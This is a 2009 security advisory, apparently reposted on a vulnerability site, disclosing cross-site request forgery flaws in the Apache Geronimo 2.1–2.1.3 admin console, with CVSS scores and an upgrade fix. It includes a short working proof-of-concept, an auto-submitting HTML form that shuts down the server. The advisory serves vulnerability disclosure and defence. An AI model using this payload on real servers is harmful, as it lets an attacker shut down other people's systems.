Apache Geronimo - XSRF vulnerabilities

2009.04.19
Credit: DSecRG
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-352


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Original Advisory: http://dsecrg.com/pages/vul/show.php?id=120 Digital Security Research Group [DSecRG] Advisory #DSECRG-09-020 Application: Apache Geronimo Application Server Versions Affected: 2.1 - 2.1.3 Vendor URL: http://geronimo.apache.org/ Bug: Multiple XSRF Vulnerabilities Exploits: YES Reported: 10.12.2008 Vendor response: 10.12.2008 Solution: YES Date of Public Advisory: 16.04.2009 CVE-number: 2009-0039 Author: Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com) Description *********** Geronimo Server Console multiple XSRF vulnerabilities. Various cross-site request forgery (XSRF or CSRF) vulnerabilities were identified in the Apache Geronimo web administration console. This affects all full JavaEE Geronimo releases or other distributions which include the administration web console up to and including Geronimo 2.1.3. Details ******* Exploiting this issue may allow a remote attacker to perform certain administrative actions, e.g. change web administration password, upload applications, etc... using predictable URL requests once the user has authenticated and obtained a valid session with the server. Example [Shutdown Server]: <html> <form action='http://[server]/console/portal//Server/Shutdown/__ac0x3console-b ase0x2ServerManager!-1172254814|0' id=1> <input type=hidden value='Shutdown' name="shutdown"> <input type=submit> </form> </html> <script> document.getElementById(1).submit(); </script> Solution ******** This security vulnerabilities fixed in Geronimo 2.1.4 release. New version of Geronimo 2.1.4 can be downloaded from this location: http://geronimo.apache.org/downloads.html An alternative workaround (if you choose to not upgrade to Apache Geronimo 2.1.4) would be to stop or undeploy the administration web console application in the server. Credits ******* http://geronimo.apache.org/21x-security-report.html#2.1.xSecurityReport- 214 About ***** Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact: research [at] dsecrg [dot] com http://www.dsecrg.com http://www.dsec.ru Regards, Digital Security Research Group [DSecRG] ________________________________________ DIGITAL SECURITY tel/fax: +7(812)703-1547 tel: +7(812)430-9130 e-mail: research (at) dsecrg (dot) com [email concealed] web: www.dsecrg.com ---------------------------------------- This message and any attachment are confidential and may be privileged or otherwise protected from disclosure. If you are not the intended recipient any use, distribution, copying or disclosure is strictly prohibited. If you have received this message in error, please notify the sender immediately either by telephone or by e-mail and delete this message and any attachment from your system. Correspondence via e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding statements by e-mail unless otherwise agreed. ----------------------------------------

References:

http://geronimo.apache.org/21x-security-report.html#2.1.xSecurityReport-214


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top